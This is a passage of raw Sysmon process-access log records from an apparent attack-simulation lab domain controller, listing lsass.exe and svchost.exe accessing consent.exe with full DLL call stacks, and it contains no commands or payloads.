07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 